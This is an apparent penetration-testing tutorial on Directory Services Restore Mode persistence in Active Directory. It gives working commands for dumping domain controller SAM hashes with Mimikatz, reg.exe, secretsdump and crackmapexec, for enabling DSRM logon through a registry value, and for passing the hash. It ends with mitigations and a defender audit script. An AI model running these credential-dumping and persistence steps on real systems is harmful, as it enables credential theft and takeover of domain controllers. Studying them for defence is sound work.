Directory Services Restore Mode (DSRM)

In every domain there is a Domain Admin named 'Administrator'. However, on every Domain Controller there is also a local Administrator. These two users are different.

How can we tell?

If you have Domain Admin privileges, dump both the SAM and the NTDS and you will get two different hashes for 'Administrator'.

The difference can also be seen with the following two Mimikatz commands, the first dumping the SAM and the second dumping the domain credentials through LSA:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

The Administrator hash from the SAM dump belongs to the local Administrator and the NTDS hash to the Domain Administrator.

The local Administrator on the DC is also known as the DSRM account.

What does this mean?

In general, the local Administrator account is hardly used on a running DC. However, when promoting a server to a Domain Controller, we are prompted to enter a DSRM password for this local Administrator. This provides a backup method for the Domain Admins to access the DC and the directory database when AD DS is unavailable.

This means that obtaining the local DC Administrator hash and then passing it provides another long-term method of persistence. It can be quite effective because the DSRM password is rarely changed.

As the local Admin is normally not able to log on to a running DC, we must first make sure that we will be able to log on by changing the "DsrmAdminLogonBehavior" registry value. This is a significant downgrade to the security of the Domain Controller. Therefore, if you are on a live engagement, make sure to check with your client that this is allowable.

Once we have the hash, we can either pass it to access the DC directly, or follow up with a DCSync attack and pull the password hashes for any account we wish, including krbtgt.

Steps

Step 1 - Dump the SAM of the DC to Obtain the DSRM Hash

  • Method 1: From Powershell - Use Mimikatz

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

  • Method 2: Copy the SAM and system hives, download them, then run secretsdump.py from impacket to extract the hash

# using reg.exe
cmd.exe /c 'reg.exe save hklm\sam c:\windows\temp\sam.bak'
cmd.exe /c 'reg.exe save hklm\system c:\windows\temp\system.bak'

# after copying the files to your machine run secretsdump.py
python secretsdump.py -sam sam.bak -system system.bak LOCAL

  • Method 3: From Linux - use crackmapexec or secretsdump.py to extract the hash remotely

# crackmapexec
crackmapexec smb <dc-ip> -u <user> -p <pass> --sam

# secretsdump.py
sudo python3 secretsdump.py <user>@<domain> -dc-ip <ip>

Step 2 - Set Up to Authenticate as Local Admin

From the DC...

# Check if 'DsrmAdminLogonBehavior' property exists
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" | select DsrmAdminLogonBehavior

# If there is no value, create a new property and set it to 2
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Then check again and make sure 'DsrmAdminLogonBehavior' is set to 2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" | select DsrmAdminLogonBehavior

Step 3 - Pass the hash

  • From another machine, attempt to logon to the DC

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<dc.domain> /user:Administrator /ntlm:<DSRM-hash> /run:powershell.exe"'

# From your new window check your access to the DC
ls \\<dc.domain>\C$

To reset the "DsrmAdminLogonBehavior" property afterwards

# If the property didn't exist beforehand
Remove-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior"

# If there was a "DsrmAdminLogonBehavior" registry key set prior
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name "DsrmAdminLogonBehavior" -Value <prior_value>

Mitigations

  • Change the DSRM password regularly

  • Check regularly for events with ID 4657 (a registry value was modified) or 4794 (an attempt was made to set the DSRM administrator password)

  • Make sure DSRM passwords are unique for each DC
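The following is an added defender-side check, not part of the original notes: run on each DC, it reports the state of the "DsrmAdminLogonBehavior" value changed in Step 2 and pulls the two event IDs listed above from the Security log. The lookback window, and the assumption that "Audit Registry" with a SACL on the Lsa key is enabled (without it no 4657 events are written for the value change), are mine.

```powershell
# Added example: audit a Domain Controller for DSRM logon tampering.
# Run in an elevated PowerShell on the DC. Assumes local Security log access.
param(
    [int]$LookbackDays = 30   # assumed default window
)

$lsaKey    = 'HKLM:\System\CurrentControlSet\Control\Lsa'
$valueName = 'DsrmAdminLogonBehavior'

# 1. Registry state. Absent or 0 is the default (DSRM admin can only log on
#    when the DC is booted into DSRM). 1 permits logon while AD DS is stopped,
#    2 permits it at any time, which is what the persistence technique needs.
$prop = Get-ItemProperty -Path $lsaKey -Name $valueName -ErrorAction SilentlyContinue
if ($null -eq $prop) {
    Write-Output "[OK] $valueName is not set"
} elseif ($prop.$valueName -eq 0) {
    Write-Output "[OK] $valueName = 0"
} else {
    Write-Warning "$valueName = $($prop.$valueName): DSRM admin logon is enabled on a running DC"
}

# 2. Security log. 4794 = attempt to set the DSRM administrator password,
#    4657 = a registry value was modified (kept only when it names the DSRM value).
#    Requires the audit policy noted above; Get-WinEvent errors when nothing
#    matches, so that case is suppressed and simply yields no rows.
$since  = (Get-Date).AddDays(-$LookbackDays)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4794, 4657; StartTime = $since } `
                       -ErrorAction SilentlyContinue

foreach ($e in $events) {
    if ($e.Id -eq 4794 -or $e.Message -match $valueName) {
        [pscustomobject]@{
            Time    = $e.TimeCreated
            EventId = $e.Id
            Summary = ($e.Message -split "`r?`n")[0]
        }
    }
}
```

Any 4657 row naming the value, or any 4794 event outside a planned DSRM password rotation, is worth investigating together with the Set-ItemProperty/New-ItemProperty changes shown in Step 2.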
